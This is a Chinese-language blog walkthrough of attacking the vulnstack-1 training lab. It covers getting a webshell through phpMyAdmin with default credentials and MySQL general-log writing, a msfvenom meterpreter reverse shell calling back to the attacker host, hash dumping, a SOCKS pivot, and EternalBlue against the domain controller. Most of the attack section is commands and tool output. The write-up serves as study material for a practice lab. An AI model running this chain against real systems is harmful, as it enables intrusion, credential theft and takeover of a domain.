vulnstack-1

vulnstack-域渗透

简单的介绍

最近比较闲就下了一个vulnstack的靶机来玩玩,正好7月份要去安恒实习,乘着这个时候好好把渗透能力再提升一下

靶机介绍

vulnstack 1的红日安全主机,web服务器是win7 dc是win2008 同时还有一台域成员主机win7是暴露在外网的同时还有一块连接内网的网卡网段是192.168.52.0/24 外网段是219.217.199.0/24
kali作为攻击机为 219.217.199.76


渗透测试

信息收集

nmap 网络主机发现
nmap -sS 219.217.199.0/24
发现主机 219.217.199.112
访问发现是phpstudy搭建的环境—->提示有phpmyadmin
访问phpmyadmin—>phpstudy mysql的密码默认为root root尝试登陆 成功

phpmyadmin getshell

在phpstudy的首页发现了网站的绝对路径C:/phpstudy/www/
现在为mysql root权限可写知道网站绝对路径—->sql写文件
select ‘‘ into outfile ‘C:/phpstudy/www/HACK.php’
但是mysql开启了secure_file_prive=null 无法写入shell
select @@secure_file_priv – 查询secure_file_priv
– secure_file_priv=NULL,禁止导入导出
– secure_file_priv=’’,不限制导入导出
– secure_file_priv=/path/,只能向指定目录导入导出
select load_file(‘c:/phpinfo.php’); – 读取文件
select ‘123’ into outfile ‘c:/shell.php’; – 写入文件
于是想到mysql查询之后会自动记录日志
查询日志信息:
show variables like ‘%general%’;
set global general_log = “ON”; – 打开日志保存
set global general_log_file = “C:/phpstudy/WWW/123.php”; – 设置日志保存路径,需先得知网站物理路径,否则即使写入了Shell也无法通过URL连接
sql执行
select ‘‘ from table_name;
蚁剑连接 219.217.199.112/123.php 密码f1oat

使用msf后续渗透

上传反弹shell的exe木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=219.217.199.76 lport=4444 -f exe > payload.exe
上传到蚁剑终端执行payload.exe
msf设置监听反弹shell
msf5> use exploit/multi/handler
msf5> set payload windows/meterpreter/reverse_tcp
msf5> show options
msf5> set lhost 219.217.199.76
msf5> exploit
接收到反弹shell
ps获取系统进程,migrate进行进程迁移防止连接不稳定断开
getuid
god\administrator
尝试msf getsystem提权
msf5>getsystem
提权成功成为system

内网信息收集

为了进一步渗透内网,进行内网的信息收集
ipconfig 查看ip
tasklist 查看进程
arp 收集内网交互的一些ip方便进行下一步渗透
net view \domain 查看域
hashdump
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > arp

ARP cache

IP address       MAC address        Interface
----------       -----------        ---------
169.254.255.255  ff:ff:ff:ff:ff:ff  24
192.168.52.138   00:0c:29:3f:5d:a9  11
192.168.52.255   ff:ff:ff:ff:ff:ff  11
219.217.199.16   18:31:bf:43:84:78  25
219.217.199.76   08:00:27:5c:65:26  25
219.217.199.254  00:1a:a9:c3:58:43  25
219.217.199.255  ff:ff:ff:ff:ff:ff  25
224.0.0.2        00:00:00:00:00:00  1
224.0.0.2        01:00:5e:00:00:02  24
224.0.0.2        01:00:5e:00:00:02  11
224.0.0.2        01:00:5e:00:00:02  14
224.0.0.2        01:00:5e:00:00:02  22
224.0.0.2        01:00:5e:00:00:02  23
224.0.0.2        01:00:5e:00:00:02  25
224.0.0.22       00:00:00:00:00:00  1
224.0.0.22       01:00:5e:00:00:16  24
224.0.0.22       01:00:5e:00:00:16  11
224.0.0.22       01:00:5e:00:00:16  14
224.0.0.22       01:00:5e:00:00:16  22
224.0.0.22       01:00:5e:00:00:16  23
224.0.0.22       01:00:5e:00:00:16  25
224.0.0.252      01:00:5e:00:00:fc  24
224.0.0.252      01:00:5e:00:00:fc  11
224.0.0.252      01:00:5e:00:00:fc  25
239.255.255.250  00:00:00:00:00:00  1
239.255.255.250  01:00:5e:7f:ff:fa  11
239.255.255.250  01:00:5e:7f:ff:fa  25
255.255.255.255  ff:ff:ff:ff:ff:ff  24
255.255.255.255  ff:ff:ff:ff:ff:ff  25

发现有192端以及219段
192段应该是内网网络了
ps查看进程的时候已经知道了域名称为GOD

设置代理进行跨网段进行信息收集

msf5 exploit(multi/handler) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > show options

Module options (auxiliary/server/socks4a):

Name Current Setting Required Description


SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on.

msf5>sessions -i 1
meterpreter> run autoroute -s 192.168.52.0/24 进行路由绑定
回到kali终端
vi /etc/proxychains.conf
添加
socks4 219.217.199.76 1080


proxychains 对138主机进行端口扫描

Auxiliary action:

Name Description


Proxy Run SOCKS4a proxy

root@kali:~# proxychains3 nmap -sT -Pn 192.168.52.138 -p 21,22,80,89,161,389,443,445,1443,1521,3306,3389,6379,8000,8080,9000 –open
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-14 23:40 EDT
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:445-<><>-OK
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:80-<><>-OK
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:443-<–timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:8080-<–timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:3389-<–timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:22-<–timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:3306-<–timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:21-<–timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:389-<><>-OK
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:1443-<–timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:1521-<–timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:9000-<–timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:6379-<–timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:8000-<–timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:89-<–timeout
|S-chain|-<>-219.217.199.76:1080-<><>-192.168.52.138:161-<–timeout
Nmap scan report for 192.168.52.138
Host is up (0.11s latency).
Not shown: 13 closed ports
PORT STATE SERVICE
80/tcp open http
389/tcp open ldap
445/tcp open microsoft-ds
发现445端口开放可能存在永恒之蓝漏洞
msf5>search ms17_010
msf5>use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description


CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /opt/metasploit-framework/embedd yes List of named pipes to check
ed/framework/data/wordlists/name
d_pipes.txt
RHOSTS yes The target host(s), range CIDR identifier, or hosts file w
ith syntax ‘file:
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.52.138
rhosts => 192.168.52.138
msf5 auxiliary(scanner/smb/smb_ms17_010) >exploit
发现存在永恒之蓝漏洞
msf5 auxiliary(scanner/smb/smb_ms17_010)>use exploit/windows/smb/ms17_010_eternalblue
设置到rhosts —>exploit
拿下DC


后记

有的时候因为网络连通的问题永恒之蓝没有利用成功需要多尝试几次,因为时间和网络的原因没有做后续的权限维持,过几天打算用Cobalt Strike再次渗透一次。做一个黄金票据以及域成员的横向移动的渗透pth等
tips:
需要用的技术有
sql语句写入shell
phpmyadmin 日志getshell
msf生成反弹shell木马
msf 绑定路由进行跨网段的渗透测试
以及使用msf的渗透模块进行对域控的渗透等

文章目录
  1. 1. vulnstack-域渗透
    1. 1.0.0.1. 简单的介绍
    2. 1.0.0.2. 靶机介绍
    3. 1.0.0.3. 渗透测试
      1. 1.0.0.3.1. 信息收集
      2. 1.0.0.3.2. phpmyadmin getshell
      3. 1.0.0.3.3. 使用msf后续渗透
      4. 1.0.0.3.4. 内网信息收集
  • 2. ARP cache
    1. 2.0.0.0.1. 设置代理进行跨网段进行信息收集
  • 2.0.0.1. 后记
  • ,